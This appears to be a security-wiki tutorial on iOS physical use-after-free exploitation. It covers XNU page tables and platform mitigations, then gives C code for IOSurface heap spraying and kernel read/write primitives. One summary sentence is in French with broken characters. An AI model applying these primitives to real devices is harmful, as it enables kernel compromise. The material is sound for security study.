iOS Physical Use After Free via IOSurface
iOS Exploit Mitigations
- Code Signing in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple's trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
- CoreTrust is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple's root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
- Data Execution Prevention (DEP) marks memory regions as non-executable unless they explicitly contain code. This prevents attackers from injecting shellcode into data regions (such as the stack or heap) and executing it, forcing them to rely on more complex techniques such as ROP (Return-Oriented Programming).
- ASLR (Address Space Layout Randomization) randomizes the memory addresses of code, libraries, the stack, and the heap on every run. This makes it much harder to predict where useful instructions or gadgets are located, breaking many exploit chains that depend on a fixed memory layout.
- KASLR (Kernel ASLR) applies the same randomization concept to the iOS kernel. By shifting the kernel's base address on every boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that aim to take full control of the system.
- Kernel Patch Protection (KPP) continuously monitors the kernel's code pages to make sure they have not been modified. If tampering is detected (for example, an exploit trying to patch kernel functions or insert malicious code), the device panics and reboots immediately. This makes persistent kernel exploits much harder, since attackers cannot hook or patch kernel instructions without triggering a system crash.
- Kernel Text Readonly Region (KTRR) is a hardware feature introduced on iOS devices. It uses the CPU's memory controller to mark the kernel's code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers, and even privileged code, from patching kernel instructions at runtime, closing off a large class of exploits that relied on modifying kernel code directly.
- Pointer Authentication Codes (PAC) use cryptographic signatures embedded in the unused upper bits of pointers to verify their integrity before use. When a pointer (such as a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer has been tampered with, validation fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory-corruption exploits, making techniques such as ROP or JOP much harder to pull off reliably (see the compiler-intrinsics sketch after this list).
- Privileged Access Never (PAN) is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables that access. This stops attackers who have gained kernel code execution from easily reading or writing user memory to escalate privileges or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
- Page Protection Layer (PPL) is an iOS security mechanism that protects critical kernel-managed memory regions, in particular those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, guaranteeing that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who obtained kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
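To make PAC concrete, here is a minimal userland sketch using the clang pointer-authentication intrinsics from <ptrauth.h>. It assumes Apple Clang and an arm64e target; the key and discriminator values are arbitrary illustrative choices, and in normal builds the compiler emits the equivalent sign/auth instructions automatically for return addresses and function pointers.

#include <ptrauth.h>   /* Apple Clang intrinsics, arm64e targets only */
#include <stdio.h>

int main(void) {
    void *fn = (void *)&puts;

    /* Sign the pointer with the DA key and an arbitrary discriminator (0x1234):
       the PAC is stored in otherwise-unused upper bits of the pointer. */
    void *signed_fn = ptrauth_sign_unauthenticated(fn, ptrauth_key_asda, 0x1234);

    /* Authenticate before use: if the pointer (or discriminator) was tampered
       with, this yields an invalid pointer that faults when dereferenced. */
    void *checked = ptrauth_auth_data(signed_fn, ptrauth_key_asda, 0x1234);

    printf("raw=%p signed=%p authenticated=%p\n", fn, signed_fn, checked);
    return 0;
}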
Physical use-after-free
Ceci est un rĂ©sumĂ© du post disponible sur https://alfiecg.uk/2024/09/24/Kernel-exploit.html ; plus dâinformations sur des exploits utilisant cette technique se trouvent Ă©galement sur https://github.com/felix-pb/kfd
Memory management in XNU
The virtual memory address space for user processes on iOS spans from 0x0 to 0x8000000000. However, these addresses don't directly map to physical memory. Instead, the kernel uses page tables to translate virtual addresses into actual physical addresses.
Levels of Page Tables in iOS
Page tables are organized hierarchically in three levels:
- L1 Page Table (Level 1):
- Each entry here represents a large range of virtual memory.
- It covers 0x1000000000 bytes (64 GB) of virtual memory.
- L2 Page Table (Level 2):
- An entry here represents a smaller region of virtual memory, specifically 0x2000000 bytes (32 MB).
- An L1 entry may point to an L2 table if it can't map the entire region itself.
- L3 Page Table (Level 3):
- This is the finest level, where each entry maps a single 16 KB memory page (iOS uses a 16 KB translation granule; the arithmetic behind these sizes is sketched right after this list).
- An L2 entry may point to an L3 table if more granular control is needed.
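The sizes above follow directly from the 16 KB translation granule: each page table is one 16 KB page holding 2048 eight-byte descriptors. A small sanity-check sketch (the constants are the ones quoted in the list above):

#define PAGE_SIZE_16K   0x4000ULL                       /* 16 KB granule */
#define ENTRIES         (PAGE_SIZE_16K / 8)             /* 2048 descriptors per table */
#define L3_ENTRY_SPAN   PAGE_SIZE_16K                   /* one page */
#define L2_ENTRY_SPAN   (ENTRIES * L3_ENTRY_SPAN)       /* 0x2000000    = 32 MB */
#define L1_ENTRY_SPAN   (ENTRIES * L2_ENTRY_SPAN)       /* 0x1000000000 = 64 GB */

_Static_assert(L2_ENTRY_SPAN == 0x2000000,    "each L2 entry covers 32 MB");
_Static_assert(L1_ENTRY_SPAN == 0x1000000000, "each L1 entry covers 64 GB");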
Mapping Virtual to Physical Memory
- Direct Mapping (Block Mapping):
- Some entries in a page table directly map a range of virtual addresses to a contiguous range of physical addresses (like a shortcut).
- Pointer to Child Page Table:
- If finer control is needed, an entry in one level (e.g., L1) can point to a child page table at the next level (e.g., L2); the low bits of the descriptor tell the two cases apart (see the sketch below).
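How the hardware distinguishes the two cases: in the ARMv8 translation-table format, the low two bits of each 64-bit descriptor encode whether the entry is invalid, a block (direct) mapping, or a pointer to a next-level table. A simplified sketch (attribute bits omitted; the output-address mask assumes a 16 KB granule):

#include <stdint.h>
#include <stdbool.h>

/* ARMv8 descriptor type, levels 1-2: bit 0 clear = invalid,
   bits [1:0] = 0b01 block mapping, 0b11 pointer to next-level table. */
static bool desc_is_valid(uint64_t d) { return d & 1; }
static bool desc_is_block(uint64_t d) { return (d & 3) == 1; }
static bool desc_is_table(uint64_t d) { return (d & 3) == 3; }

/* Physical address carried by a table descriptor (16 KB granule: bits [47:14]);
   attribute and permission bits are simply masked off here. */
static uint64_t desc_table_address(uint64_t d) {
    return d & 0x0000FFFFFFFFC000ULL;
}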
Example: Mapping a Virtual Address
Let's say you try to access the virtual address 0x1000000000:
- L1 Table:
- The kernel checks the L1 page table entry corresponding to this virtual address. If it has a pointer to an L2 page table, it goes to that L2 table.
- L2 Table:
- The kernel checks the L2 page table for a more detailed mapping. If this entry points to an L3 page table, it proceeds there.
- L3 Table:
- The kernel looks up the final L3 entry, which points to the physical address of the actual memory page.
Example of Address Mapping
If you write the physical address 0x800004000 into the first index of the L2 table, then:
- Virtual addresses from 0x1000000000 to 0x1002000000 map to physical addresses from 0x800004000 to 0x802004000.
- This is a block mapping at the L2 level.
Alternatively, if the L2 entry points to an L3 table:
- Each 16 KB page in the virtual address range 0x1000000000 -> 0x1002000000 would be mapped by individual entries in the L3 table (see the index-calculation sketch below).
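Putting the walk together: with a 16 KB granule, the page offset is 14 bits and each table level consumes 11 bits of the virtual address (2048 = 2^11 entries per table), except L1, which only needs 3 bits for the 0x0-0x8000000000 user range. A minimal illustration of the index arithmetic (not kernel code):

#include <stdint.h>
#include <stdio.h>

static void split_virtual_address(uint64_t va) {
    uint64_t offset = va & 0x3FFF;           /* bits [13:0]:  byte offset in the 16 KB page */
    uint64_t l3_idx = (va >> 14) & 0x7FF;    /* bits [24:14]: index into the L3 table */
    uint64_t l2_idx = (va >> 25) & 0x7FF;    /* bits [35:25]: index into the L2 table */
    uint64_t l1_idx = (va >> 36) & 0x7;      /* bits [38:36]: 8 L1 entries x 64 GB = 0x8000000000 */

    printf("VA 0x%llx -> L1[%llu] L2[%llu] L3[%llu] + offset 0x%llx\n",
           (unsigned long long)va, (unsigned long long)l1_idx,
           (unsigned long long)l2_idx, (unsigned long long)l3_idx,
           (unsigned long long)offset);
}

/* Example from the text: 0x1000000000 resolves to L1[1], L2[0], L3[0], offset 0. */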
Physical use-after-free
A physical use-after-free (UAF) occurs when:
- A process allocates some memory as readable and writable.
- The page tables are updated to map this memory to a specific physical address that the process can access.
- The process deallocates (frees) the memory.
- However, due to a bug, the kernel forgets to remove the mapping from the page tables, even though it marks the corresponding physical memory as free.
- The kernel can then reallocate this "freed" physical memory for other purposes, like kernel data.
- Since the mapping wasn't removed, the process can still read and write to this physical memory.
This means the process can access pages of kernel memory, which could contain sensitive data or structures, potentially allowing an attacker to manipulate kernel memory.
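For orientation, here is a heavily simplified sketch of what the primitive looks like from the attacker's process. The trigger function is a placeholder for the actual vulnerability (every physical UAF bug has its own trigger); the Mach VM calls are standard userspace APIs:

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <string.h>

/* Placeholder: the real bug must make the kernel free the physical pages backing
   [addr, addr + size) while leaving this process's PTEs pointing at them. */
extern void trigger_physical_free_without_unmap(mach_vm_address_t addr, mach_vm_size_t size);

void build_puaf_primitive(void) {
    mach_vm_address_t addr = 0;
    mach_vm_size_t    size = 64 * 0x4000;                 /* 64 x 16 KB pages */

    mach_vm_allocate(mach_task_self(), &addr, size, VM_FLAGS_ANYWHERE);
    memset((void *)addr, 'A', size);                      /* fault the pages in */

    trigger_physical_free_without_unmap(addr, size);      /* vulnerability-specific */

    /* The physical pages are now on the kernel's free list but still mapped here:
       once the kernel reuses them (e.g. for sprayed IOSurface objects), reads through
       addr leak kernel data and writes through addr corrupt it. */
}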
IOSurface Heap Spray
Since the attacker can't control which specific kernel pages will be allocated to freed memory, they use a technique called heap spray:
- The attacker creates a large number of IOSurface objects in kernel memory.
- Each IOSurface object contains a magic value in one of its fields, making it easy to identify.
- They scan the freed pages to see if any of these IOSurface objects landed on a freed page.
- When they find an IOSurface object on a freed page, they can use it to read and write kernel memory.
More info about this in https://github.com/felix-pb/kfd/tree/main/writeups
tip
Be aware that modern devices (A12 and later) bring hardware-backed mitigations such as PPL (and, on newer chips running iOS 17+, SPTM) that make physical UAF techniques far less viable.
PPL enforces strict MMU protections on pages related to code signing, entitlements, and sensitive kernel data, so, even if a page gets reused, writes from userland or compromised kernel code to PPL-protected pages are blocked.
Secure Page Table Monitor (SPTM) extends PPL by hardening page table updates themselves. It ensures that even privileged kernel code cannot silently remap freed pages or tamper with mappings without going through secure checks.
KTRR (Kernel Text Read-Only Region) locks down the kernel's code section as read-only after boot. This prevents any runtime modification of kernel code, closing off a major attack vector that physical UAF exploits often rely on.
Moreover, IOSurface allocations are less predictable and harder to map into user-accessible regions, which makes the "magic value scanning" trick much less reliable. And IOSurface is now guarded by entitlements and sandbox restrictions.
Step-by-Step Heap Spray Process
- Spray IOSurface Objects: The attacker creates many IOSurface objects with a special identifier ("magic value").
- Scan Freed Pages: They check if any of the objects have been allocated on a freed page.
- Read/Write Kernel Memory: By manipulating fields in the IOSurface object, they gain the ability to perform arbitrary reads and writes in kernel memory. This lets them:
- Use one field to read any 32-bit value in kernel memory.
- Use another field to write 64-bit values, achieving a stable kernel read/write primitive.
Generate IOSurface objects tagged with the magic value IOSURFACE_MAGIC so they can be located later:
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
    if (*nClients >= 0x4000) return;
    for (int i = 0; i < nSurfaces; i++) {
        fast_create_args_t args;
        lock_result_t result;

        size_t size = IOSurfaceLockResultSize;
        args.address = 0;
        args.alloc_size = *nClients + 1;          // used later as an index back into clients[]
        args.pixel_format = IOSURFACE_MAGIC;      // recognizable tag to scan for

        // External method 6 creates the IOSurface object in kernel memory
        IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
        io_connect_t id = result.surface_id;

        (*clients)[*nClients] = id;
        *nClients += 1;
    }
}
Search for IOSurface objects in a freed physical page:
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
    io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
    int nSurfaceIDs = 0;

    for (int i = 0; i < 0x400; i++) {
        // Spray a batch of tagged IOSurface objects, then scan the dangling pages
        spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);

        for (int j = 0; j < nPages; j++) {
            uint64_t start = puafPages[j];
            uint64_t stop = start + (pages(1) / 16);

            for (uint64_t k = start; k < stop; k += 8) {
                if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
                    // A sprayed IOSurface landed on a freed (but still mapped) page
                    info.object = k;
                    info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];  // alloc_size encodes its index
                    if (self_task) *self_task = iosurface_get_receiver(k);
                    goto sprayDone;
                }
            }
        }
    }

sprayDone:
    // Release every sprayed surface except the one overlapping the dangling page
    for (int i = 0; i < nSurfaceIDs; i++) {
        if (surfaceIDs[i] == info.surface) continue;
        iosurface_release(client, surfaceIDs[i]);
    }
    free(surfaceIDs);

    return 0;
}
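For context, this is roughly how the two routines above would be driven once the PUAF pages exist. open_iosurface_root_client() and puaf_pages[] are hypothetical placeholders for exploit-specific plumbing (opening the IOSurfaceRoot user client and collecting the dangling user-space addresses):

io_connect_t client = open_iosurface_root_client();   /* placeholder helper */
uint64_t self_task = 0;
uint64_t winner_page = 0;

/* puaf_pages[] holds user VAs whose backing physical pages were freed but are
   still mapped; iosurface_krw() sprays surfaces until one lands on such a page. */
iosurface_krw(client, puaf_pages, n_puaf_pages, &self_task, &winner_page);

/* From here on, info.object / info.surface identify the overlapping IOSurface
   and the kernel read/write helpers below can be used. */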
Achieving Kernel Read/Write with IOSurface
After gaining control of an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), it can be used for arbitrary kernel read and write operations.
Key Fields in IOSurface
The IOSurface object has two crucial fields:
- Use Count Pointer: allows a 32-bit read.
- Indexed Timestamp Pointer: allows a 64-bit write.
By overwriting these pointers, they are redirected to arbitrary addresses in kernel memory, enabling read/write capabilities.
32-Bit Kernel Read
To perform a read:
- Overwrite the use count pointer so that it points to the target address minus a 0x14-byte offset.
- Use the get_use_count method to read the value at that address.
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
    uint64_t args[1] = {surfaceID};
    uint32_t size = 1;
    uint64_t out = 0;
    IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
    return (uint32_t)out;
}

uint32_t iosurface_kread32(uint64_t addr) {
    uint64_t orig = iosurface_get_use_count_pointer(info.object);
    iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
    uint32_t value = get_use_count(info.client, info.surface);
    iosurface_set_use_count_pointer(info.object, orig);
    return value;
}
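The 32-bit read is enough to synthesize wider primitives. For example, a 64-bit read can be assembled from two 32-bit reads (a small helper sketch building on the iosurface_kread32 above; arm64 is little-endian, so the low word sits at the lower address):

uint64_t iosurface_kread64(uint64_t addr) {
    uint32_t lo = iosurface_kread32(addr);        /* low 32 bits  */
    uint32_t hi = iosurface_kread32(addr + 4);    /* high 32 bits */
    return ((uint64_t)hi << 32) | lo;
}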
64-Bit Kernel Write
To perform a write:
- Overwrite the indexed timestamp pointer so that it points to the target address.
- Use the set_indexed_timestamp method to write a 64-bit value.
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
    uint64_t args[3] = {surfaceID, 0, value};
    IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}

void iosurface_kwrite64(uint64_t addr, uint64_t value) {
    uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
    iosurface_set_indexed_timestamp_pointer(info.object, addr);
    set_indexed_timestamp(info.client, info.surface, value);
    iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
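Similarly, narrower writes can be built on top of the 64-bit write by doing a read-modify-write of the enclosing 8-byte word. A sketch assuming the iosurface_kread64 helper above and a 4-byte-aligned target address:

void iosurface_kwrite32(uint64_t addr, uint32_t value) {
    uint64_t aligned = addr & ~7ULL;                 /* enclosing 8-byte word */
    int      shift   = (addr & 4) ? 32 : 0;          /* which half to replace */
    uint64_t qword   = iosurface_kread64(aligned);   /* helper sketched above */

    qword &= ~(0xFFFFFFFFULL << shift);
    qword |= (uint64_t)value << shift;
    iosurface_kwrite64(aligned, qword);
}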
Exploit Flow Recap
- Trigger Physical Use-After-Free: freed pages become available for reuse while still being mapped into userspace.
- Spray IOSurface Objects: allocate many IOSurface objects tagged with a unique "magic value" in kernel memory.
- Identify Accessible IOSurface: locate an IOSurface that landed on a freed page you control.
- Abuse Use-After-Free: modify pointers inside the IOSurface object to enable arbitrary kernel read/write through IOSurface methods.
With these primitives, the exploit provides controlled 32-bit reads and 64-bit writes to kernel memory. Further jailbreak steps may involve more stable read/write primitives, which can require bypassing additional protections (e.g., PPL on newer arm64e devices).